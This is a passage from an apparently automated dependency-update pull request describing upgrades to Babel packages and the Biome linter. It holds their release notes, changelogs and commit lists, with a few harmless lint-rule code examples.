href=\"https://github.com/babel/babel/commit/99f498a9b9fa0b900d603fbe8f6601bb3b9e42bb\"\u003e\u003ccode\u003e99f498a\u003c/code\u003e\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/18001\"\u003e#18001\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/feba0a3654c596bd369d1ef1231f5d56666d56dc\"\u003e\u003ccode\u003efeba0a3\u003c/code\u003e\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17998\"\u003e#17998\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-core\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/preset-env` from 7.29.2 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/preset-env's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/3cd910d838332b988ed83bdd2ddc22e849e7ea5d\"\u003e\u003ccode\u003e3cd910d\u003c/code\u003e\u003c/a\u003e v7.29.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/3d399f8c8c1e5308bb25e11947d90a111399ac0d\"\u003e\u003ccode\u003e3d399f8\u003c/code\u003e\u003c/a\u003e [7.x backport]docs(preset-env): update CONTRIBUTING.md (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17976\"\u003e#17976\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/183db7bc040a68057489f8981d02962345a322ed\"\u003e\u003ccode\u003e183db7b\u003c/code\u003e\u003c/a\u003e v7.29.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/268f246f21e51b2204ba6dc5349055504cc7420d\"\u003e\u003ccode\u003e268f246\u003c/code\u003e\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17788\"\u003e#17788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/f8524d80799e136313e55da0468777a57d1bf6b6\"\u003e\u003ccode\u003ef8524d8\u003c/code\u003e\u003c/a\u003e Update compat data (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17686\"\u003e#17686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-preset-env\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@biomejs/biome` from 2.4.9 to 2.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/biomejs/biome/releases\"\u003e@​biomejs/biome's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eBiome CLI v2.4.15\u003c/h2\u003e\n\u003ch2\u003e2.4.15\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9394\"\u003e#9394\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-test-hooks-in-order\"\u003e\u003ccode\u003euseTestHooksInOrder\u003c/code\u003e\u003c/a\u003e in the \u003ccode\u003etest\u003c/code\u003e domain. The rule enforces that Jest/Vitest lifecycle hooks (\u003ccode\u003ebeforeAll\u003c/code\u003e, \u003ccode\u003ebeforeEach\u003c/code\u003e, \u003ccode\u003eafterEach\u003c/code\u003e, \u003ccode\u003eafterAll\u003c/code\u003e) are declared in the order they execute, making test setup and teardown easier to reason about.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10254\"\u003e#10254\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-next-tick-promise/\"\u003e\u003ccode\u003euseVueNextTickPromise\u003c/code\u003e\u003c/a\u003e, which enforces Promise syntax when using Vue \u003ccode\u003enextTick\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { nextTick } from \u0026quot;vue\u0026quot;;\n\u003cp\u003enextTick(() =\u0026gt; {\nupdateDom();\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10219\"\u003e#10219\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-v-on-number-values/\"\u003e\u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e\u003c/a\u003e, that disallows deprecated number modifiers on Vue \u003ccode\u003ev-on\u003c/code\u003e directives.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"vue\"\u003e\u003ccode\u003e\u0026lt;input @keyup.13=\u0026quot;submit\u0026quot; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10195\"\u003e#10195\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-valid-v-for/\"\u003e\u003ccode\u003euseVueValidVFor\u003c/code\u003e\u003c/a\u003e, which validates Vue \u003ccode\u003ev-for\u003c/code\u003e directives and reports invalid aliases, missing component keys, and keys that do not use iteration variables.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10238\"\u003e#10238\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the recommended nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-import-compiler-macros/\"\u003e\u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e\u003c/a\u003e, which disallows importing Vue compiler macros such as \u003ccode\u003edefineProps\u003c/code\u003e from \u003ccode\u003evue\u003c/code\u003e because they are automatically available.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10201\"\u003e#10201\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1a08f89df55eafe1d8463696d1be53f8dea90a80\"\u003e\u003ccode\u003e1a08f89\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/realknove\"\u003e\u003ccode\u003e@​realknove\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10193\"\u003e#10193\u003c/a\u003e: \u003ccode\u003estyle/useReadonlyClassProperties\u003c/code\u003e no longer reports class properties as readonly-able when they are assigned inside arrow callbacks nested in class property initializers.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9574\"\u003e#9574\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/3bd2b6adf0be44eda922ad7610781dd2e387bdb6\"\u003e\u003ccode\u003e3bd2b6a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/9530\"\u003e#9530\u003c/a\u003e. The diagnostics of \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e\u003ccode\u003eorganizeImports\u003c/code\u003e\u003c/a\u003e are now more detailed and more precise. They are also better at localizing where the issue is.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10205\"\u003e#10205\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/a704a6c40392e71aad5127ab35c771486116937e\"\u003e\u003ccode\u003ea704a6c\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10185\"\u003e#10185\u003c/a\u003e. \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e`organizeImports\u003c/a\u003e now errors when it encounters an unknown predefined group.\u003c/p\u003e\n\u003cp\u003eThe following configuration is now reported as invalid because \u003ccode\u003e:INEXISTENT:\u003c/code\u003e is an unknown predefined group.\u003c/p\u003e\n\u003cpre lang=\"json\"\u003e\u003ccode\u003e{\n  \u0026quot;assist\u0026quot;: {\n    \u0026quot;actions\u0026quot;: {\n      \u0026quot;source\u0026quot;: {\n        \u0026quot;organizeImports\u0026quot;: { \u0026quot;options\u0026quot;: { \u0026quot;groups\u0026quot;: [\u0026quot;:INEXISTENT:\u0026quot;] } }\n      }\n    }\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/biomejs/biome/blob/main/packages/@biomejs/biome/CHANGELOG.md\"\u003e@​biomejs/biome's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.4.15\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9394\"\u003e#9394\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-test-hooks-in-order\"\u003e\u003ccode\u003euseTestHooksInOrder\u003c/code\u003e\u003c/a\u003e in the \u003ccode\u003etest\u003c/code\u003e domain. The rule enforces that Jest/Vitest lifecycle hooks (\u003ccode\u003ebeforeAll\u003c/code\u003e, \u003ccode\u003ebeforeEach\u003c/code\u003e, \u003ccode\u003eafterEach\u003c/code\u003e, \u003ccode\u003eafterAll\u003c/code\u003e) are declared in the order they execute, making test setup and teardown easier to reason about.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10254\"\u003e#10254\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-next-tick-promise/\"\u003e\u003ccode\u003euseVueNextTickPromise\u003c/code\u003e\u003c/a\u003e, which enforces Promise syntax when using Vue \u003ccode\u003enextTick\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { nextTick } from \u0026quot;vue\u0026quot;;\n\u003cp\u003enextTick(() =\u0026gt; {\nupdateDom();\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10219\"\u003e#10219\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-v-on-number-values/\"\u003e\u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e\u003c/a\u003e, that disallows deprecated number modifiers on Vue \u003ccode\u003ev-on\u003c/code\u003e directives.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"vue\"\u003e\u003ccode\u003e\u0026lt;input @keyup.13=\u0026quot;submit\u0026quot; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10195\"\u003e#10195\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-valid-v-for/\"\u003e\u003ccode\u003euseVueValidVFor\u003c/code\u003e\u003c/a\u003e, which validates Vue \u003ccode\u003ev-for\u003c/code\u003e directives and reports invalid aliases, missing component keys, and keys that do not use iteration variables.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10238\"\u003e#10238\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the recommended nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-import-compiler-macros/\"\u003e\u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e\u003c/a\u003e, which disallows importing Vue compiler macros such as \u003ccode\u003edefineProps\u003c/code\u003e from \u003ccode\u003evue\u003c/code\u003e because they are automatically available.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10201\"\u003e#10201\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1a08f89df55eafe1d8463696d1be53f8dea90a80\"\u003e\u003ccode\u003e1a08f89\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/realknove\"\u003e\u003ccode\u003e@​realknove\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10193\"\u003e#10193\u003c/a\u003e: \u003ccode\u003estyle/useReadonlyClassProperties\u003c/code\u003e no longer reports class properties as readonly-able when they are assigned inside arrow callbacks nested in class property initializers.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9574\"\u003e#9574\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/3bd2b6adf0be44eda922ad7610781dd2e387bdb6\"\u003e\u003ccode\u003e3bd2b6a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/9530\"\u003e#9530\u003c/a\u003e. The diagnostics of \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e\u003ccode\u003eorganizeImports\u003c/code\u003e\u003c/a\u003e are now more detailed and more precise. They are also better at localizing where the issue is.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10205\"\u003e#10205\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/a704a6c40392e71aad5127ab35c771486116937e\"\u003e\u003ccode\u003ea704a6c\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10185\"\u003e#10185\u003c/a\u003e. \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e`organizeImports\u003c/a\u003e now errors when it encounters an unknown predefined group.\u003c/p\u003e\n\u003cp\u003eThe following configuration is now reported as invalid because \u003ccode\u003e:INEXISTENT:\u003c/code\u003e is an unknown predefined group.\u003c/p\u003e\n\u003cpre lang=\"json\"\u003e\u003ccode\u003e{\n  \u0026quot;assist\u0026quot;: {\n    \u0026quot;actions\u0026quot;: {\n      \u0026quot;source\u0026quot;: {\n        \u0026quot;organizeImports\u0026quot;: { \u0026quot;options\u0026quot;: { \u0026quot;groups\u0026quot;: [\u0026quot;:INEXISTENT:\u0026quot;] } }\n      }\n    }\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/9dd3271eef16090416b6e77615a01e3bfbcf7993\"\u003e\u003ccode\u003e9dd3271\u003c/code\u003e\u003c/a\u003e ci: release (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10210\"\u003e#10210\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e feat(lint/html/vue): add \u003ccode\u003euseVueValidVFor\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10195\"\u003e#10195\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003euseTestHooksInOrder\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9394\"\u003e#9394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e feat(lint/js/vue): add \u003ccode\u003euseVueNextTickPromise\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10254\"\u003e#10254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e feat(lint/vue): add \u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10238\"\u003e#10238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/7f7419cc831cc0725c44669964d8ad8f318d4375\"\u003e\u003ccode\u003e7f7419c\u003c/code\u003e\u003c/a\u003e fix: grammar in extends 